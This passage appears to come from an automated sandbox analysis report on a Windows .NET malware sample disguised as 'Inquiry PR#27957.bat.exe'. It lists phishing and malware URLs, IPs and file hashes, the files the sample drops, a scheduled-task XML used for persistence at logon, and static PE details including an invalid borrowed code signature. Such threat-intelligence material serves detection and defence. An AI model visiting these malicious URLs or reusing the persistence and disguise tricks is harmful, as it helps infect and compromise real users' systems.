                                                      https://public-usa.mkt.dynamics.com/api/orgs/5c8c0184-a605-ef11-9f85-6045bd00390f/r/j0QY9SVMHE2ykWUnkq7W4wAAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fisaustralia.com.au%252Fdoc%252Findex.php%253Fmail%253D%2520ryan_scott%2540office.com%2526paths%253Dabove%2526link%253DFax_Outlook%22%2C%22RedirectOptions%22%3A%7B%221%22%3Anull%7D%7D&digest=0BTPcenE%2BSe3bCywe6VBjbwnefP6rRpeXY%2FFBeN4nTE%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                      • 43.250.140.8
                                                      CLOUDFLARENETUShttps://0i0000923330.cc/2dr/index.htmlGet hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      https://pcpocu.shop/Get hashmaliciousUnknownBrowse
                                                      • 104.16.198.133
                                                      Autoliv Purchase Order #1727784.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      https://cloudflare-ipfs.com/ipfs/QmP2SgKUomqtvY4PmVtfbbHb2qdpL8VK8mAkoBJyub4nU4/index2sal2606.html#info@daiichi-sankyo.ptGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.64.14
                                                      1050-C10 8000 - HV501_03.exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.96.3
                                                      EGS-EP2409 #U5907#U4ef6#U7533#U8bf7#U5355 (HATCH COVER).exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.96.3
                                                      Selvretfrdig.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      https://l39.n8xgn.com/l39/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                      • 104.17.25.14
                                                      3e#U0441.exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.97.3
                                                      xE5gan.xlsGet hashmaliciousRemcosBrowse
                                                      • 172.66.43.27
                                                      INWXDEmrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                      • 185.181.104.242
                                                      2JQN1P3Y7e.exeGet hashmaliciousFormBookBrowse
                                                      • 185.181.104.242
                                                      Universalmiddel169.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 185.181.104.242
                                                      CLOUDFLARENETUShttps://0i0000923330.cc/2dr/index.htmlGet hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      https://pcpocu.shop/Get hashmaliciousUnknownBrowse
                                                      • 104.16.198.133
                                                      Autoliv Purchase Order #1727784.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      https://cloudflare-ipfs.com/ipfs/QmP2SgKUomqtvY4PmVtfbbHb2qdpL8VK8mAkoBJyub4nU4/index2sal2606.html#info@daiichi-sankyo.ptGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.64.14
                                                      1050-C10 8000 - HV501_03.exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.96.3
                                                      EGS-EP2409 #U5907#U4ef6#U7533#U8bf7#U5355 (HATCH COVER).exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.96.3
                                                      Selvretfrdig.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      https://l39.n8xgn.com/l39/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                      • 104.17.25.14
                                                      3e#U0441.exeGet hashmaliciousGuLoaderBrowse
                                                      • 188.114.97.3
                                                      xE5gan.xlsGet hashmaliciousRemcosBrowse
                                                      • 172.66.43.27
                                                      LHPLInquiries_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 5.252.231.250
                                                      2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                      • 5.252.231.250
                                                      KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                      • 5.252.231.250
                                                      bPYR660y5o.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      • 185.135.90.183
                                                      A6yWw0hs74.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      p2l1D8TV94.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      Wwhv0rbIoV.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      YP61700IK.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      Begraensningen.exeGet hashmaliciousGuLoaderBrowse
                                                      • 185.135.90.183
                                                      Halkbank_Ekstre_20230918_44390_097542.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      • 185.135.90.183

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Inquiry PR#27957.bat.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fuqwoDzun.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\fuqwoDzun.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.379677338874509
                                                      Encrypted:false
                                                      SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:tLHxvIIwLgZ2KRHWLOug8s
                                                      MD5:AAC9B2CC385B2595E11AAF60C4652279
                                                      SHA1:5F14BE9EC829371BFAC9DDBF97BF156C13E03341
                                                      SHA-256:0C17939EA24BBFE7F727AFB0FABC5BAFC8F2A8A5218BC9B2A7580A54B510EC84
                                                      SHA-512:3BC9F81C7C9FD417B7F486550EBBE95CF4BA5408E013AB11FA54400F49DB8ACDAD5EE28C95278DACF62E6FDB30071D193EED741616C91E48F9A2ADC92EAAB257
                                                      Malicious:false
                                                      Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                      C:\Users\user\AppData\Local\Temp\30-335c-

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\sfc.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1221538113908904
                                                      Encrypted:false
                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                      MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                      SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                      SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                      SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bqoxsyv.0tb.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ytmigfx.o1s.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52d3jg3x.gek.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ssbsy5a.xna.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kilpmkri.esp.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmiyy5uf.j13.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qj3iycfy.ayd.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sq4p4rdb.3iz.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\tmp2C94.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1568
                                                      Entropy (8bit):5.086063760426755
                                                      Encrypted:false
                                                      SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewm+uv:HeLwYrFdOFzOz6dKrsuqn+0
                                                      MD5:34A7E634A78FEDC4DBED6DB889282F9F
                                                      SHA1:BE793491A37AF112B9A33D1A52BA7982FDDFB8AE
                                                      SHA-256:1FCB5B692FF418D3936B713B3C1A5083D653E172BA3E94F62962570C806313E1
                                                      SHA-512:8834FF5C934FAE32B4F0707C7DF16FDBE3EC489E5B089085140E6545CAD744714CB9A20F2ED0C3F2FE316C7BA3E3D3F14150DE3F4C69B9F51F7BB6FF4BF28266
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                                      C:\Users\user\AppData\Local\Temp\tmp40A9.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\fuqwoDzun.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1568
                                                      Entropy (8bit):5.086063760426755
                                                      Encrypted:false
                                                      SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewm+uv:HeLwYrFdOFzOz6dKrsuqn+0
                                                      MD5:34A7E634A78FEDC4DBED6DB889282F9F
                                                      SHA1:BE793491A37AF112B9A33D1A52BA7982FDDFB8AE
                                                      SHA-256:1FCB5B692FF418D3936B713B3C1A5083D653E172BA3E94F62962570C806313E1
                                                      SHA-512:8834FF5C934FAE32B4F0707C7DF16FDBE3EC489E5B089085140E6545CAD744714CB9A20F2ED0C3F2FE316C7BA3E3D3F14150DE3F4C69B9F51F7BB6FF4BF28266
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                                      C:\Users\user\AppData\Roaming\fuqwoDzun.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):879624
                                                      Entropy (8bit):7.7276775085868445
                                                      Encrypted:false
                                                      SSDEEP:12288:Kug4N2iNPkQetDqi68Qtx/QtWXF/WF9XZNQ64xx0uCffNDOgxSlFutDG54BsUYlE:dN11668MGZZG64B25/Sl8tDCtUayI7k
                                                      MD5:9972524538C9F43A23AD683DA0A1A97A
                                                      SHA1:4FE56974A8A9DB66FB9026B0C817A84111CB834B
                                                      SHA-256:499EF83EEE9CEF5EFA3DFC22FC88A6962289722A65626EC1630721E930784287
                                                      SHA-512:F345D5B30A53085393F4D7D6D626D2D20E2C410896AB906C039C3D745ED967480C2B4A03E4EC46D1A2F775E940D1E1161D4A07075ABED84DB301536AF12C973E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[.f.................,...........K... ...`....@.. ....................................@..................................J..W....`..L............6...6........................................................... ............... ..H............text...4+... ...,.................. ..`.rsrc...L....`......................@..@.reloc...............4..............@..B.................K......H....... ....a......$... ...............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....ow...:q....(....+..(........}.........(......*................n..}.....{....,..{....oZ...*..{....*.s..

                                                      C:\Users\user\AppData\Roaming\fuqwoDzun.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.7276775085868445
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:Inquiry PR#27957.bat.exe
                                                      File size:879'624 bytes
                                                      MD5:9972524538c9f43a23ad683da0a1a97a
                                                      SHA1:4fe56974a8a9db66fb9026b0c817a84111cb834b
                                                      SHA256:499ef83eee9cef5efa3dfc22fc88a6962289722a65626ec1630721e930784287
                                                      SHA512:f345d5b30a53085393f4d7d6d626d2d20e2c410896ab906c039c3d745ed967480c2b4a03e4ec46d1a2f775e940d1e1161d4a07075abed84db301536af12c973e
                                                      SSDEEP:12288:Kug4N2iNPkQetDqi68Qtx/QtWXF/WF9XZNQ64xx0uCffNDOgxSlFutDG54BsUYlE:dN11668MGZZG64B25/Sl8tDCtUayI7k
                                                      TLSH:C215E060F148BDD3C55644FBDC61F94223BABB56562ED6956CF2B4CA10F27C22222E0F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..f.................,...........K... ...`....@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4d4b2e
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x668CD05B [Tue Jul 9 05:53:31 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                      Subject Chain
                                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                      Version:3
                                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                      Serial:7C1118CBBADC95DA3752C46E47A27438

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
